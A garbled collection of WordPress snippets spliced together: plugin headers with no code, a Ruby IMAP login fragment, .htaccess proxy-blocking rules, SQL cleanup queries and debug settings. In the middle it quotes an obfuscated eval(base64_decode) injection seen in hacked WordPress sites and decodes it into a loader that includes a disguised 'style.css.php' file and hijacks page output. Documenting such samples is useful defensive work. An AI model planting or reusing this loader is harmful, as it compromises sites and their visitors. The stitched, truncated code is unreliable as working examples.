<?php
/*
Plugin Name: Index.php fix
Plugin URI: http://ilikewordpress.com/loading-wordpress-from-index-php
Description: This plugin allows a blog installed at root to be addressed by /index.php. Remedies stripping of filename by includes/canonical.php
Author: Steve Johnson
Version: 1.0
Author URI: http://ilikewordpress.com/
*/
#!/usr/bin/ruby
require 'net/imap'

server = 'imap.mail.com'
username = 'YOUR USERNAME'
password = 'YOUR PASSWORD'
folder = 'INBOX'

# Connect over implicit TLS (IMAPS, port 993), then authenticate.
imap = Net::IMAP.new(server, port: 993, ssl: true)
imap.login(username, password)
# Return 403 Forbidden to any request that carries one of these proxy-related headers.
RewriteEngine on
RewriteCond %{HTTP:VIA} !^$ [OR]
RewriteCond %{HTTP:FORWARDED} !^$ [OR]
RewriteCond %{HTTP:USERAGENT_VIA} !^$ [OR]
RewriteCond %{HTTP:X_FORWARDED_FOR} !^$ [OR]
RewriteCond %{HTTP:PROXY_CONNECTION} !^$ [OR]
RewriteCond %{HTTP:XPROXY_CONNECTION} !^$ [OR]
RewriteCond %{HTTP:HTTP_PC_REMOTE_ADDR} !^$ [OR]
RewriteCond %{HTTP:HTTP_CLIENT_IP} !^$
RewriteRule ^(.*)$ - [F]
WP Bag of Tricks
1. Helpful Scripts/Plugins:
Hacks:
http://wordpress.org/extend/plugins/tac/
http://wordpress.org/extend/plugins/exploit-scanner/ (Can be extremely resource intensive.)
http://wordpress.org/extend/plugins/wp-malwatch/
-- Identifiers are quoted with backticks; single quotes would turn them into string literals.
DELETE FROM `wp_options` WHERE `option_name` LIKE CONVERT( _utf8 '_transient_feed%' USING latin1 ) COLLATE latin1_swedish_ci;
<?php
/*
Plugin Name: Gravatar Hovercards
Plugin URI: http://ottopress.com/2010/gravatar-hovercards/
Description: Hover over a Gravatar to get more info. Neat-o!
Version: 0.1
Author: Otto
*/
function gravatar_hovercards_jquery() {
I've been seeing this code crop up a lot in recent WordPress hacks:
<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL3VzZXIvZG9tYWluLmNvbS93cC1pbmNsdWRlcy9qcy90aW55bWNlL3RoZW1lcy9hZHZhbmNlZC9za2lucy93cF90aGVtZS9pbWcvc3R5bGUuY3NzLnBocCc7aWYoZmlsZV9leGlzdHMoJEdMT0JBTFNbJ21mc24nXSkpe2luY2x1ZGVfb25jZSgkR0xPQkFMU1snbWZzbiddKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiZmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe29iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>
The issue normally involves "wp-login.php" returning a blank page for users trying to get into "wp-admin".
Running that bit of nastiness thru a base64 decoder gets us this:
if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){$GLOBALS['mfsn']='/home/user/domain.com/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/style.css.php';if(file_exists($GLOBALS['mfsn'])){include_once($GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}}
Clean debugging:
// Add this to wp-config.php to cleanly debug a site.
// Just make sure to turn it off when you're done!
define('WP_DEBUG', true); // Turn debugging ON
define('WP_DEBUG_DISPLAY', false); // Turn forced display OFF
define('WP_DEBUG_LOG', true); // Turn logging to wp-content/debug.log ON
# Drop this in a .htaccess file in wp-content to keep the log safe.
<files debug.log>
update wp_posts set post_content = replace(post_content,'’','\'');
update wp_posts set post_title = replace(post_title,'’','\'');
update wp_comments set comment_content = replace(comment_content,'’','\'');
update wp_postmeta set meta_value = replace(meta_value,'’','\'');
update wp_posts set post_excerpt = replace(post_excerpt,'’','\'');
update wp_posts set post_content = replace(post_content,'…','...');
update wp_posts set post_title = replace(post_title,'…','...');
update wp_comments set comment_content = replace(comment_content,'…','...');
update wp_postmeta set meta_value = replace(meta_value,'…','...');
<form method="get" action="http://duckduckgo.com/"
      onsubmit="document.getElementById('ddgsearchinput').value+=' site:example.com'">
  <input type="search" id="ddgsearchinput" name="q" size="24"/>
</form>